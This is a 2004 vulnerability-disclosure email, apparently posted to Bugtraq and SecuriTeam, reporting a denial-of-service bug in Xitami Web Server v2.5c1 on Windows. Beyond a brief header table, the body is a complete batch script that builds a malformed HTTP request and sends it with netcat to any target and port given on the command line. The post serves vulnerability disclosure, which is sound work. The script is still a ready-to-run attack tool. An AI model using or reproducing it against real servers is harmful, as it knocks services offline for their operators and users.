
Date: Wed, 21 Jul 2004 16:34:55 +0800
From: "CoolICE" <CoolICE@...na.com>
To: "info" <info@...tix.com>
Cc: "bugtraq" <bugtraq@...urityfocus.com>,
	"list" <list@...uriteam.com>
Subject: DOS@...amiHTTPd


Application:	Xitami Web Server
Vendors:	http://www.xitami.com/xiopen_2_5.zip
Version:	v2.5c1
Platforms:	Windows
Bug:		D.O.S
Date:		2004-07-15
Author:		CoolICE
e-mail:		CoolICE#China.com
================
Content:
----------------
TestCode:
@echo off
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Application:	Xitami Web Server
:Vendors:	http://www.xitami.com/xiopen_2_5.zip
:Version:	v2.5c1
:Platforms:	Windows
:Bug:		D.O.S
:Date:		2004-07-15
:Author:	CoolICE
:e-mail:	CoolICE#China.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
if '%1'=='' echo Usage:%0 target [port]&&goto :eof
set PORT=80
if not '%2'=='' set PORT=%2
for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe echo Need nc.exe&&goto :eof
echo GET / HTTP/1.0>http.tmp
echo HOST: %1>>http.tmp
echo DOS>>http.tmp
echo.>>http.tmp
nc -w 10 %1 %PORT% < http.tmp
del http.tmp




